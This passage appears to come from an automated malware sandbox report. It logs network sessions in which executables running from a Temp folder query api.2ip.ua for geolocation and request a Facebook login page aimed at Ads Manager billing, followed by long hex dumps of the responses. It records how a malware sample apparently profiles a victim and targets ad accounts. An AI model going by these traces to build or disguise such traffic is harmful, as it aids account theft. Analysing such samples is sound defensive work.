f5 e3 a3 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d7 ec a1 28 8f 82 36 76 b4 8b 67 ee e8 d9 d3 ed
                                                                                    Data Ascii: }toidrnskrmctjlz}f6w&$~4wlwhdlnmtutunnmrj~f~Jx0(6vg
                                                                                    2023-02-07 18:45:05 UTC187INData Raw: 3f 2a 3f 2e 3f 32 3f 36 3f 3a 3f 3e 3f 42 3f 46 3f 4a 3f 4e 3f 52 3f 56 3f 5a 3f 5e 3f 62 3f 66 3f 6a 3f 6e 3f 72 3f 76 3f 7a 3f 7e 3f 82 3f 86 3f 8a 3f 8e 3f 92 3f 96 3f 9a 3f 9e 3f a2 3f a6 3f aa 3f ae 3f b2 3f b6 3f ba 3f be 3f c2 3f c6 3f ca 3f ce 3f d2 3f d6 3f da 3f de 3f e2 3f e6 3f ea 3f ee 3f f2 3f f6 3f fa 3f 00 d0 02 00 b8 00 00 00 20 30 24 30 28 30 2c 30 30 30 34 30 38 30 3c 30 40 30 44 30 48 30 4c 30 50 30 54 30 58 30 5c 30 60 30 64 30 68 30 6c 30 70 30 74 30 78 30 7c 30 80 30 84 30 88 30 8c 30 90 30 94 30 98 30 9c 30 a0 30 a4 30 a8 30 ac 30 b0 30 b4 30 b8 30 bc 30 c0 30 c4 30 c8 30 cc 30 d0 30 e0 30 e8 30 ec 30 f0 30 f4 30 f8 30 fc 30 00 31 04 31 08 31 0c 31 18 31 94 31 9c 31 a4 31 ac 31 b4 31 bc 31 c4 31 cc 31 d4 31 dc 31 e4 31 ec 31 f4 31
                                                                                    Data Ascii: ?*?.?2?6?:?>?B?F?J?N?R?V?Z?^?b?f?j?n?r?v?z?~???????????????????????????????? 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|00000000000000000000000000000111111111111111111


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.349701162.0.217.254443C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:45:06 UTC194OUTGET /geo.json HTTP/1.1
                                                                                    User-Agent: Microsoft Internet Explorer
                                                                                    Host: api.2ip.ua
                                                                                    2023-02-07 18:45:06 UTC194INHTTP/1.1 429 Too Many Requests
                                                                                    Date: Tue, 07 Feb 2023 18:45:06 GMT
                                                                                    Server: Apache
                                                                                    Strict-Transport-Security: max-age=63072000; preload
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 1; mode=block; report=...
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                    Upgrade: h2,h2c
                                                                                    Connection: Upgrade, close
                                                                                    Transfer-Encoding: chunked
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    2023-02-07 18:45:06 UTC194INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                    Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    10192.168.2.349726157.240.253.35443C:\Users\user\AppData\Local\Temp\98D7.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-07 18:46:01 UTC921OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                    Host: www.facebook.com
                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
                                                                                    sec-ch-ua: "Not_A Brand";v="99", "Microsoft Edge";v="109", "Chromium";v="109"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    sec-ch-prefers-color-scheme: light
                                                                                    Upgrade-Insecure-Requests: 1
                                                                                    Sec-Fetch-Site: none
                                                                                    Sec-Fetch-Mode: navigate
                                                                                    Sec-Fetch-User: ?1
                                                                                    Sec-Fetch-Dest: document
                                                                                    2023-02-07 18:46:02 UTC922INHTTP/1.1 200 OK
                                                                                    Vary: Accept-Encoding
                                                                                    report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                    cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                    x-fb-rlafr: 0
                                                                                    content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                    document-policy: force-load-at-top
                                                                                    cross-origin-opener-policy: same-origin-allow-popups
                                                                                    Pragma: no-cache
                                                                                    Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                    Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: DENY
                                                                                    origin-agent-cluster: ?0
                                                                                    Strict-Transport-Security: max-age=15552000; preload
                                                                                    Content-Type: text/html; charset="utf-8"
                                                                                    X-FB-Debug: bxwvdbrgClsx+PdemRXJOjBYv4pKJipljh+/3Dp9t+2JUiIz5DTHjHyPglofsSz9K5JRTLaDf+hnWOWyR5fgbw==
                                                                                    2023-02-07 18:46:02 UTC924INData Raw: 44 61 74 65 3a 20 54 75 65 2c 20 30 37 20 46 65 62 20 32 30 32 33 20 31 38 3a 34 36 3a 30 32 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                    Data Ascii: Date: Tue, 07 Feb 2023 18:46:02 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400Connection: close
                                                                                    2023-02-07 18:46:02 UTC924INData Raw: 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 0d 0a
                                                                                    Data Ascii: 2d<!DOCTYPE html><html lang="en" id="facebook"
                                                                                    2023-02-07 18:46:02 UTC924INData Raw: 65 38 38 0d 0a 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 51 41 39 63 46 46 42 55 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e
                                                                                    Data Ascii: e88 class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="QA9cFFBU">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["En
                                                                                    2023-02-07 18:46:02 UTC926INData Raw: 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 79 76 2f 72 2f 42 38 42 78 73 73 63 66 56 42 72 2e 69 63 6f 22 20 2f 3e 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 45 2f 6c 2f 30 2c 63 72 6f 73 73 2f 52 73 70 77 45 31 55 59 4c 77 72 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 50 75 64 36 42 32 5a 22 20 2f
                                                                                    Data Ascii: nk rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yE/l/0,cross/RspwE1UYLwr.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /
                                                                                    2023-02-07 18:46:02 UTC927INData Raw: 22 31 38 31 34 38 35 32 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 33 38 31 34 32 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 2c 22 31 39 34 39 38 39 38 22 3a 7b 22 72 22 3a 31 7d 2c 22 31 38 34 38 38 31 35 22 3a 7b 22 72 22 3a 31 30 30 30 30 2c 22 73 22 3a 31 7d 2c 22 31 37 34 34 31 37 38 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 36 37 36 38 33 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 4e 38 77 42 5a 41 38 63 74 43 64 48 77 6c 72 67 22 7d 2c 22 36 37 36 39 32 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 39 37 49 58 34 67 4f 46 47 38 67 5a 65 68 76 51 22 7d 2c 22 37 30 38 32 35 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c
                                                                                    Data Ascii: "1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":10000,"s":1},"1744178":{"r":1,"s":1}},"gkxData":{"676837":{"result":false,"hash":"AT4N8wBZA8ctCdHwlrg"},"676920":{"result":true,"hash":"AT497IX4gOFG8gZehvQ"},"708253":{"result":fal
                                                                                    2023-02-07 18:46:02 UTC928INData Raw: 63 35 36 66 0d 0a 41 22 7d 2c 22 33 38 33 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 57 32 33 6c 51 30 58 78 41 5a 6e 69 4d 77 33 51 22 7d 2c 22 34 30 37 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 5f 5a 51 69 30 73 54 6a 53 74 2d 52 78 56 38 6f 22 7d 2c 22 38 31 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 34 55 37 71 47 30 36 70 39 73 46 36 75 38 61 7a 49 22 7d 2c 22 36 37 36 38 33 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6e 4e 31 65 68 54 39 79 71 2d 32 71 36 37 52 6f 22 7d 2c 22 31 32 31 37 31 35 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68
                                                                                    Data Ascii: c56fA"},"3831":{"result":false,"hash":"AT4W23lQ0XxAZniMw3Q"},"4075":{"result":false,"hash":"AT4_ZQi0sTjSt-RxV8o"},"8126":{"result":false,"hash":"AT4U7qG06p9sF6u8azI"},"676838":{"result":false,"hash":"AT6nN1ehT9yq-2q67Ro"},"1217157":{"result":false,"hash
                                                                                    2023-02-07 18:46:02 UTC930INData Raw: 7b 22 74 22 3a 31 35 38 32 38 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6d 5f 70 69 78 65 6c 5f 72 61 74 69 6f 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 6e 6f 73 63 72 69 70 74 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 70 72 65 73 65 6e 63 65 22 3a 7b 22 74 22 3a 32 35 39 32 30 30 30 2c 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 73 66 61 75 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 75 73 69 64 61 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 76 70 64 22 3a 7b 22 74 22 3a 35 31 38 34 30 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 77 64 22 3a 7b 22 74 22 3a 36 30 34 38 30 30 2c 22 73 22 3a 22 4c 61 78 22 7d 2c 22 78 2d 72 65 66 65 72 65 72 22 3a 7b 22 73 22 3a 22 4e 6f 6e 65 22 7d 2c 22 78 2d 73
                                                                                    Data Ascii: {"t":158284800,"s":"None"},"m_pixel_ratio":{"t":604800,"s":"None"},"noscript":{"s":"None"},"presence":{"t":2592000,"s":"None"},"sfau":{"s":"None"},"usida":{"s":"None"},"vpd":{"t":5184000,"s":"Lax"},"wd":{"t":604800,"s":"Lax"},"x-referer":{"s":"None"},"x-s
                                                                                    2023-02-07 18:46:02 UTC931INData Raw: 2c 22 73 65 6d 72 5f 68 6f 73 74 5f 62 75 63 6b 65 74 22 3a 22 33 22 2c 22 62 6c 5f 68 61 73 68 5f 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73 6b 69 70 5f 72 64 5f 62 6c 22 3a 74 72 75 65 2c 22 63 6f 6d 65 74 5f 65 6e 76 22 3a 30 2c 22 77 62 6c 6f 6b 73 5f 65 6e 76 22 3a 66 61 6c 73 65 2c 22 73 70 69 6e 22 3a 34 2c 22 5f 5f 73 70 69 6e 5f 72 22 3a 31 30 30 36 39 32 32 39 36 32 2c 22 5f 5f 73 70 69 6e 5f 62 22 3a 22 74 72 75 6e 6b 22 2c 22 5f 5f 73 70 69 6e 5f 74 22 3a 31 36 37 35 37 39 35 35 36 32 2c 22 76 69 70 22 3a 22 31 35 37 2e 32 34 30 2e 32 35 33 2e 33 35 22 7d 2c 33 31 37 5d 2c 5b 22 53 70 72 69 6e 6b 6c 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 70 61 72 61 6d 5f 6e 61 6d 65 22 3a 22 6a 61 7a 6f 65 73 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 32 2c 22 73
                                                                                    Data Ascii: ,"semr_host_bucket":"3","bl_hash_version":2,"skip_rd_bl":true,"comet_env":0,"wbloks_env":false,"spin":4,"__spin_r":1006922962,"__spin_b":"trunk","__spin_t":1675795562,"vip":"157.240.253.35"},317],["SprinkleConfig",[],{"param_name":"jazoest","version":2,"s
                                                                                    2023-02-07 18:46:02 UTC932INData Raw: 4e 5f 55 50 4c 4f 41 44 5f 44 49 41 4c 4f 47 22 2c 22 53 4e 49 56 59 5f 47 52 4f 55 50 5f 42 59 5f 45 56 45 4e 54 5f 54 52 41 43 45 5f 49 44 5f 41 4e 44 5f 4e 41 4d 45 22 2c 22 41 44 53 5f 53 54 4f 52 45 5f 56 49 53 49 54 53 5f 4d 45 54 52 49 43 53 5f 44 45 50 52 45 43 41 54 49 4f 4e 22 2c 22 41 44 5f 44 52 41 46 54 5f 45 4e 41 42 4c 45 5f 53 59 4e 43 52 48 4f 4e 4f 55 53 5f 46 52 41 47 4d 45 4e 54 5f 56 41 4c 49 44 41 54 49 4f 4e 22 2c 22 53 45 50 41 52 41 54 45 5f 4d 45 53 53 41 47 49 4e 47 5f 43 4f 4d 41 43 54 49 56 49 54 59 5f 50 41 47 45 5f 50 45 52 4d 53 22 2c 22 4c 41 42 5f 4e 45 54 5f 4e 45 57 5f 55 49 5f 52 45 4c 45 41 53 45 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45 52 53 5f 43 52 45 41 54 45 22 2c 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53 54 45
                                                                                    Data Ascii: N_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_METRICS_DEPRECATION","AD_DRAFT_ENABLE_SYNCRHONOUS_FRAGMENT_VALIDATION","SEPARATE_MESSAGING_COMACTIVITY_PAGE_PERMS","LAB_NET_NEW_UI_RELEASE","POCKET_MONSTERS_CREATE","POCKET_MONSTE
                                                                                    2023-02-07 18:46:02 UTC934INData Raw: 6d 65 73 73 61 67 65 5f 63 68 61 6e 6e 65 6c 22 3a 74 72 75 65 7d 2c 33 34 31 39 5d 2c 5b 22 44 54 53 47 49 6e 69 74 44 61 74 61 22 2c 5b 5d 2c 7b 22 74 6f 6b 65 6e 22 3a 22 22 2c 22 61 73 79 6e 63 5f 67 65 74 5f 74 6f 6b 65 6e 22 3a 22 22 7d 2c 33 35 31 35 5d 2c 5b 22 55 72 69 4e 65 65 64 52 61 77 51 75 65 72 79 53 56 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 75 72 69 73 22 3a 5b 22 64 6d 73 2e 6e 65 74 6d 6e 67 2e 63 6f 6d 22 2c 22 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 72 2e 6d 73 6e 2e 63 6f 6d 22 2c 22 77 61 74 63 68 69 74 2e 73 6b 79 2e 63 6f 6d 22 2c 22 67 72 61 70 68 69 74 65 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 22 2c 22 77 77 77 2e 6b 66 63 2e 63 6f 2e 74 68 22 2c 22 6c 65 61 72 6e 2e 70 61 6e 74 68 65 6f 6e 2e 69 6f 22 2c 22 77
                                                                                    Data Ascii: message_channel":true},3419],["DTSGInitData",[],{"token":"","async_get_token":""},3515],["UriNeedRawQuerySVConfig",[],{"uris":["dms.netmng.com","doubleclick.net","r.msn.com","watchit.sky.com","graphite.instagram.com","www.kfc.co.th","learn.pantheon.io","w
                                                                                    2023-02-07 18:46:02 UTC935INData Raw: 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 46 62 74 52 65 73 75 6c 74 47 4b 22 2c 5b 5d 2c 7b 22 73 68 6f 75 6c 64 52 65 74 75 72 6e 46 62 74 52 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 69 6e 6c 69 6e 65 4d 6f 64 65 22 3a 22 4e 4f 5f 49 4e 4c 49 4e 45 22 7d 2c 38 37 36 5d 2c 5b 22 49 6e 74 6c 50 68 6f 6e 6f 6c 6f 67 69 63 61 6c 52 75 6c 65 73 22 2c 5b 5d 2c 7b 22 6d 65 74 61 22 3a 7b 22 5c 2f 5f 42 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 5e 29 22 2c 22 5c 2f 5f 45 5c 2f 22 3a 22 28 5b 2e 2c 21 3f 5c 5c 73 5d 7c 24 29 22 7d 2c 22 70 61 74 74 65 72 6e 73 22 3a 7b 22 5c 2f 5c 75 30 30 30 31 28 2e 2a 29 28 27 7c 26 23 30 33 39 3b 29 73 5c 75 30 30 30 31 28 3f 3a 27 7c 26 23 30 33 39 3b 29 73 28 2e 2a 29 5c 2f 22 3a 22 5c 75 30 30 30 31 24 31 24 32 73 5c 75
                                                                                    Data Ascii: ":{}},551],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\/_B\/":"([.,!?\\s]|^)","\/_E\/":"([.,!?\\s]|$)"},"patterns":{"\/\u0001(.*)('|&#039;)s\u0001(?:'|&#039;)s(.*)\/":"\u0001$1$2s\u
                                                                                    2023-02-07 18:46:02 UTC937INData Raw: 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63 65 5f 72 65 64 69 72 65 63 74 5c 2f 6c 5c 2f 22 3a 31 2c 22 5c 2f 6c 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 73 72 2e 70 68 70 22 3a 31 2c 22 5c 2f 61 6a 61 78 5c 2f 64 74 73 67 5c 2f 22 3a 31 2c 22 5c 2f 63 68 65 63 6b 70 6f 69 6e 74 5c 2f 62 6c 6f 63 6b 5c 2f 22 3a 31 2c 22 5c 2f 65 78 69 74 64 73 69 74 65 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 70 69 78 65 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 62 61 6c 61 6e 63 65 5c 2f 63 61 72 72 69 65 72 5f 6c 61 6e 64 69 6e 67
                                                                                    Data Ascii: _balance_redirect\/":1,"\/zero_balance_redirect":1,"\/zero_balance_redirect\/l\/":1,"\/l.php":1,"\/lsr.php":1,"\/ajax\/dtsg\/":1,"\/checkpoint\/block\/":1,"\/exitdsite":1,"\/zero\/balance\/pixel\/":1,"\/zero\/balance\/":1,"\/zero\/balance\/carrier_landing
                                                                                    2023-02-07 18:46:02 UTC938INData Raw: 6c 65 61 72 6e 6d 6f 72 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 75 72 63 68 61 73 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 75 70 67 72 61 64 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 73 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 63 68 61 6e 6e 65 6c 5c 2f 72 65 63 6f 6e 6e 65 63 74 2e 70 68 70 22 3a 31 2c 22 5c 2f 77 61 70 5c 2f 61 5c 2f 6e 75 78 5c 2f 77 69 7a 61 72 64 5c 2f 6e 61 76 2e 70 68 70 22 3a 31 2c 22 5c 2f
                                                                                    Data Ascii: learnmore\/":1,"\/upsell\/purchase\/":1,"\/upsell\/promos\/upgrade\/":1,"\/upsell\/buy_redirect\/":1,"\/upsell\/loan\/buyconfirm\/":1,"\/upsell\/loan\/buy\/":1,"\/upsell\/sms\/":1,"\/wap\/a\/channel\/reconnect.php":1,"\/wap\/a\/nux\/wizard\/nav.php":1,"\/
                                                                                    2023-02-07 18:46:02 UTC940INData Raw: 4b 2d 47 35 34 7c 66 64 2e 41 63 5a 41 45 38 62 58 4d 49 6a 52 47 4b 4c 64 38 59 38 53 45 61 71 78 53 32 56 46 2d 69 31 49 55 41 73 56 71 77 4c 51 46 70 32 43 4c 55 58 6b 4f 51 5a 75 56 50 2d 31 76 30 5f 4b 5a 4c 74 32 6c 48 35 32 37 37 47 41 6e 52 4c 67 56 4e 32 4b 4a 6a 57 78 4d 5a 62 38 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31 30 34 30 35 35 38 22 2c 22 65 6e 61 62 6c 65 5f 62 6c 61 64 65 72 75 6e 6e 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 61 63 6b 22 3a 74 72 75 65 2c 22 70 75 73 68 5f 70 68 61 73 65 22 3a 22 43 33 22 2c 22 65 6e 61 62 6c 65 5f 6f 62 73 65 72 76 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 64 61 74 61 6c 6f 73 73 5f 74 69 6d 65 72 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 66 61 6c 6c 62 61 63
                                                                                    Data Ascii: K-G54|fd.AcZAE8bXMIjRGKLd8Y8SEaqxS2VF-i1IUAsVqwLQFp2CLUXkOQZuVP-1v0_KZLt2lH5277GAnRLgVN2KJjWxMZb8","app_id":"256281040558","enable_bladerunner":false,"enable_ack":true,"push_phase":"C3","enable_observer":false,"enable_dataloss_timer":false,"enable_fallbac
                                                                                    2023-02-07 18:46:02 UTC941INData Raw: 39 34 35 76 30 56 31 4a 56 69 56 55 76 6f 46 72 41 55 58 6b 52 4f 45 43 77 31 62 36 72 54 76 56 47 6f 4f 74 45 73 7a 38 33 76 47 4e 44 66 6f 75 55 61 39 58 31 71 49 5f 4b 74 47 31 58 7a 39 38 30 64 32 6c 68 76 32 59 4a 4c 78 5f 69 6c 61 39 49 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 32 54 79 5f 75 6a 4e 73 39 34 35 76 30 56 31 4a 56 69 56 55 76 6f 46 72 41 55 58 6b 52 4f 45 43 77 31 62 36 72 54 76 56 47 6f 4f 74 45 73 7a 38 33 76 47 4e 44 66 6f 75 55 61 39 58 31 71 49 5f 4b 74 47 31 58 7a 39
